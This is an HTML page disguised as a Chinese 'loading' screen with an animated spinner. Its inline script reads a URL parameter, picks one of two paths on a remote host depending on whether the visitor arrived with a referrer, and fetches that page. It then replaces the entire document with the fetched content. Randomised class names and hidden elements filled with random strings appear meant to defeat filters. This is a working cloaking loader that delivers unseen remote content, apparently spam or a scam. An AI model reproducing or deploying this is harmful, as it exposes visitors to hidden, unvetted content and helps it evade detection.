<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .oSBAWhEARJV {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .oSBAWhEARJV .wC1aGv5wj {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .oSBAWhEARJV .content {
            line-height: 50px;
            text-align: center
        }

        .oSBAWhEARJV .img {
            width: 100%
        }

        .oSBAWhEARJV .XooBd25j {
            text-align: center
        }

        .oSBAWhEARJV .XooBd25j span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .oSBAWhEARJV .XooBd25j span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .oSBAWhEARJV .XooBd25j span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .oSBAWhEARJV .XooBd25j span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .oSBAWhEARJV .XooBd25j span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .oSBAWhEARJV .XooBd25j span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .oSBAWhEARJV .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function JIfYPi1sH8fo(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var rRerM0 = JIfYPi1sH8fo('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ rRerM0 +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ rRerM0 +".html?a=share";
		}
		
        N52ZLnpelG=url+"#"+new Date().getTime();
        N52ZLnpelG && function() {
            $.get(N52ZLnpelG, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<li style='display:none' >xHwcuSI6Rw2nCz453jMHWAspSFSEb4A1RgZfCWwEccGHRegEwC6kNApR7zUcKJ2SgH19cdClrdW4WKDP</li>
<h1 style='display:none' >UPKhbiOCJM0avnRPt3y6n09nNJbFpv9ajqZaHX9LIYvJ8JNjruzaWZytQMzLf9w1gcPRiyB6NoKFCQHh8O</h1>
<span style='display:none'>ioQgpHzMAZkWR7L6r8KQIeGQHsHfftqGkfTN2IeTQcT8cCMITmLk</span>
<h1 style='display:none' >UPKhbiOCJM0avnRPt3y6n09nNJbFpv9ajqZaHX9LIYvJ8JNjruzaWZytQMzLf9w1gcPRiyB6NoKFCQHh8O</h1>
<b style='display:none' >WfcqkDjFSDs</b>
<a  href='#' style='display:none'>iFtmExrKmSSYkrCZgs8vjPdDzGQOaClv8MA60JWyU71vmDdrXHTdDSzs9Zjvxpmhwgf9uIYDQh</a>
<span style='display:none'>ioQgpHzMAZkWR7L6r8KQIeGQHsHfftqGkfTN2IeTQcT8cCMITmLk</span>
<b style='display:none' >WfcqkDjFSDs</b><div class="oSBAWhEARJV">
    <div class="wC1aGv5wj">
        <div class="XooBd25j">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<li style='display:none' >SjoXMY7cxVyTXND3ygkO4PM15V0Br3Q6j4ryZ2e9jvDVNrY9ywZSAbrangMV4sx9kf5PRtmycPzrSEc353hlJfQpdsiFTCHHEvO</li>
<p  style='display:none'>MLaEeaZYdkQV2BPcThbQbbSn3ePXq0WV837RXIFSFtzNdAvrVxH4fWJgFrifNzz7Yb1sTyI6squu</p>
<span style='display:none'>n0CluS3XhiIq0YRsa7T70op5juP1c3H0wW4OumO9q68YZg4RhxXF</span>
<img  src='' style='display:none'></body>
</html>